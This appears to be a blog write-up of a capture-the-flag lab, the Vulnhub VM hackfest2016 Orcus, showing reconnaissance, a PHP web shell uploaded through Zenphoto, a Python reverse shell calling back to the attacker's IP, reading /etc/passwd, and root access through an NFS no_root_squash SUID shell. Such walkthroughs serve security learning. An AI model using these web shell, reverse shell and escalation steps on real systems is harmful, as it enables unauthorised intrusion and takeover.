Mr_H4sh

Infosec, CTF and more

hackfest2016: Orcus Solution

In this post I’m going to show you how to solve the hackfest2016: Orcus provided by Viper.

You can find the VM on this link

The goal of the VM is to gain root access to the machine and capture 4 flags.

Attacker: 192.168.56.1
Victim: 192.168.56.102

I run a nmap on the TCP ports, and this is what I get:

Increasing send delay for 192.168.56.102 from 0 to 5 due to 5535 out of 13837 dropped probes since last increase.
Nmap scan report for 192.168.56.102
Host is up (0.00028s latency).
Not shown: 65511 closed ports
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp    open     domain      ISC BIND 9.10.3-P4-Ubuntu
80/tcp    open     http        Apache httpd 2.4.18 ((Ubuntu))
110/tcp   open     pop3        Dovecot pop3d
111/tcp   open     rpcbind     2-4 (RPC #100000)
139/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
143/tcp   open     imap        Dovecot imapd
443/tcp   open     ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
445/tcp   open     netbios-ssn Samba smbd 3.X (workgroup: ORCUS)
993/tcp   open     ssl/imap    Dovecot imapd
995/tcp   open     ssl/pop3    Dovecot pop3d
2049/tcp  open     nfs         2-4 (RPC #100003)
10006/tcp filtered unknown
25399/tcp filtered unknown
27416/tcp filtered unknown
34024/tcp filtered unknown
37414/tcp open     mountd      1-3 (RPC #100005)
37423/tcp open     nlockmgr    1-4 (RPC #100021)
44483/tcp open     mountd      1-3 (RPC #100005)
45465/tcp filtered unknown
50200/tcp filtered unknown
50614/tcp open     mountd      1-3 (RPC #100005)
55312/tcp filtered unknown
56207/tcp filtered unknown
MAC Address: 08:00:27:0B:43:51 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

I see that ports 139 and 445 are open, so I run enum4linux to get some information about the system, and I find out that there’s a user called kippo, and since I saw that there are 2 ports open for SSH I actually wonder if on the system is installed “Kippo Honeypot”.

I also see that the port 2049 is open, which means that a folder could be mounted:

$ showmount -e 192.168.56.102
Export list for 192.168.56.102:
/tmp *

I download the entire site with the help of dirb and wget:

$ dirb http://192.168.56.102/ big.txt | tee dirb_192,168.56.102.txt
$ cat dirb_192.168.56.102.txt | grep DIRECTORY
==> DIRECTORY: http://192.168.56.102/FCKeditor/                                                                                   
==> DIRECTORY: http://192.168.56.102/admin/                                                                                       
==> DIRECTORY: http://192.168.56.102/backups/                                                                                     
==> DIRECTORY: http://192.168.56.102/cron/                                                                                        
==> DIRECTORY: http://192.168.56.102/external/                                                                                    
==> DIRECTORY: http://192.168.56.102/files/                                                                                       
==> DIRECTORY: http://192.168.56.102/framework/                                                        
[...]
$ cat 192.168.56.102_80_directories.txt | cut -d " " -f 3 > url_directories.txt
$ for directory in $(cat url_directories.txt); do wget -r -p -E -k $directory; done;
--2017-03-21 09:17:47--  http://192.168.56.102/FCKeditor/
Connecting to 192.168.56.102:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 749 [text/html]
Saving to: ‘192.168.56.102/FCKeditor/index.html’

192.168.56.102/FCKeditor/index.h 100%[=========================================================>]     749  --.-KB/s    in 0s      

2017-03-21 09:17:47 (57.4 MB/s) - ‘192.168.56.102/FCKeditor/index.html’ saved [749/749]

Loading robots.txt; please ignore errors.
--2017-03-21 09:17:47--  http://192.168.56.102/robots.txt
Reusing existing connection to 192.168.56.102:80.
HTTP request sent, awaiting response... 200 OK
Length: 1347 (1.3K) [text/plain]
Saving to: ‘192.168.56.102/robots.txt’

192.168.56.102/robots.txt        100%[=========================================================>]   1.32K  --.-KB/s    in 0s      

2017-03-21 09:17:47 (102 MB/s) - ‘192.168.56.102/robots.txt’ saved [1347/1347]

[...]

$ ls -l
total 4
drwxrwxrwx 1 anthony anthony 4096 Mar 21 09:18 192.168.56.102
$ ls -l 192.168.56.102/
total 397
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 admin
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:17 backups
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:17 cron
drwxrwxrwx 1 anthony anthony   8192 Mar 21 09:18 external
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:17 FCKeditor
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 files
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 framework
-rwxrwxrwx 1 anthony anthony 126042 Oct 29 01:11 Hack_The_Planet3.jpg
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 icons
-rwxrwxrwx 1 anthony anthony    101 Mar 21 09:18 index.html
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 install
-rwxrwxrwx 1 anthony anthony 232182 Oct 29 01:10 Orcus.jpg
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 phpmyadmin
-rwxrwxrwx 1 anthony anthony   1347 Nov  2 02:46 robots.txt
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 themes
drwxrwxrwx 1 anthony anthony      0 Mar 21 09:18 tmp
drwxrwxrwx 1 anthony anthony   4096 Mar 21 09:18 zenphoto

I see that in the backup folder there’s the file SimplePHPQuiz.tar.gz. I decompress it and in the file SimplePHPQuiz/includes/db_conn.php I find some database credentials:

DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

So, the credentials are dbuser:dbpassword. I try them on both the URLs http://192.168.56.102/phpmyadmin/ and http://192.168.56.102/zenphoto, and it works.

On Zenphoto, I store an admin user with the credentials admin:admin123admin.

I manage to upload a shell through http://192.168.56.102/zenphoto/zp-core/admin-upload.php?page=upload&tab=http&type=images.

I create a zip file that contains a file called shell.php with the following content:

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

So, I create the compressed file shell.php.zip and I upload it on the website, then I visit the URL http://192.168.56.102/zenphoto/albums/zip1/ and there’s a directory listing that shows my shell.php file, so I try http://192.168.56.102/zenphoto/albums/zip1/shell.php?cmd=id and I find out that I’m www-data.

So, I visit the URL http://192.168.56.102/zenphoto/albums/zip1/shell.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.1%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 and I get a reverse shell:

$ nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [192.168.56.102] port 4444 [tcp/*] accepted (family 2, sport 57400)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ /sbin/ifconfig
eth0      Link encap:Ethernet  HWaddr 08:00:27:0b:43:51  
          inet addr:192.168.56.102  Bcast:192.168.56.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3658319 errors:287 dropped:0 overruns:0 frame:0
          TX packets:3645099 errors:3 dropped:0 overruns:0 carrier:3
          collisions:0 txqueuelen:1000 
          RX bytes:722504268 (722.5 MB)  TX bytes:1933335679 (1.9 GB)
          Interrupt:10 Base address:0xd020 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:40208 errors:0 dropped:0 overruns:0 frame:0
          TX packets:40208 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:2952730 (2.9 MB)  TX bytes:2952730 (2.9 MB)

$ hostname
Orcus
$ cat /var/www/flag.txt
/var/www/flag.txt
868c889965b7ada547fae81f922e45c4

First flag taken.

I get in the file /var/www/html/backups/ssh-creds.bak the following content:

www-data@Orcus:/var/www/html/backups$ cat ssh-creds.bak
cat ssh-creds.bak
root:123456

This must be a troll, but you’ll never know. I’ll keep this in my notes.

So, I go ahead and check the /etc/passwd file:

www-data@Orcus:/var/www$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
bind:x:104:114::/var/cache/bind:/bin/false
postfix:x:105:115::/var/spool/postfix:/bin/false
dovecot:x:106:117:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:107:118:Dovecot login user,,,:/nonexistent:/bin/false
landscape:x:108:119::/var/lib/landscape:/bin/false
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:110:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
avahi:x:111:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:112:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
kippo:x:1001:27::/home/kippo:/bin/bash
statd:x:113:65534::/var/lib/nfs:/bin/false
systemd-timesync:x:114:125:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:115:126:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:116:127:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:117:128:systemd Bus Proxy,,,:/run/systemd:/bin/false
uuidd:x:100:101::/run/uuidd:/bin/false
lxd:x:118:65534::/var/lib/lxd/:/bin/false
_apt:x:119:65534::/nonexistent:/bin/false
dnsmasq:x:120:65534:dnsmasq,,,:/var/lib/misc:/bin/false

Since the port 2049 is open, and I see from the /etc/exports that the partition /tmp as no_root_squash. Lucky me!

www-data@Orcus:/$ cat /etc/exports
cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#		to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/tmp *(rw,no_root_squash)

I copy /bin/sh in the /tmp folder, then mount the folder into my machine and add the SUID bit to the file:

On the Victim's Machine:

www-data@Orcus:/tmp$ cp /bin/sh .
cp /bin/sh .
www-data@Orcus:/tmp$ ls -la
ls -la
total 220
drwxrwxrwt  9 root     root       4096 Mar 20 09:40 .
drwxr-xr-x 24 root     root       4096 Oct 30 23:05 ..
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .ICE-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .Test-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .X11-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .XIM-unix
drwxrwxrwt  2 root     root       4096 Mar 20 04:51 .font-unix
-rwxr-xr-x  1 www-data www-data 173644 Mar 20 09:40 sh
drwx------  3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-dovecot.service-7G0NXL
drwx------  3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-systemd-timesyncd.service-8PuvUn

Then I create a shell for root and add the SUID bit, and make it executable:

On the Attacker's Machine:

# cat ./sh > root_shell
# chmod 4777 root_shell

And then I run it on the victim’s machine, becoming root:

www-data@Orcus:/tmp$ ls -l
ls -l
total 364
-rwxr-xr-x 1 www-data www-data   9163 Mar 20 09:12 enum.sh
-rwsrwxrwx 1 root     root     173644 Mar 20 10:10 root_shell
-rwxr-xr-x 1 www-data www-data 173644 Mar 20 09:40 sh
drwx------ 3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-dovecot.service-7G0NXL
drwx------ 3 root     root       4096 Mar 20 04:51 systemd-private-318297eca1cd42348ed8da4c63e2f698-systemd-timesyncd.service-8PuvUn
www-data@Orcus:/tmp$ ./root_shell -p
./root_shell -p
# id
id
uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

# cat /root/flag.txt
cat /root/flag.txt
807307b49314f822985d0410de7d8bfe

Got root and flag, and added my ssh key to access with a more stable shell.

I wander around, and since I found the user kippo for the Kippo Honeypot I go to check the configuration of the system, and I got lucky: within the path /etc/kippo/data/userdb.txt there was the flag:

root@Orcus:/etc/kippo/data# cat userdb.txt 
root:0:123456
fakuser:1:TH!SP4SSW0RDIS4Fl4G!

Now I understand the purpose of the file ssh-cred.bak.

At the moment of writing, I’ve found just three flags. I’ve played with also Sedna (but I haven’t released a write-up because the only Privilege Escalation exploit that I’ve found was DirtyC0W, and the system kept crashing, so no write-up unfortunately), but I can’t really check what is different between this VM and the other systems, so my path finishes here. Of course, if you find another one, please leave a comment.

Thank you to Viper for the VM and Vulnhub for hosting it.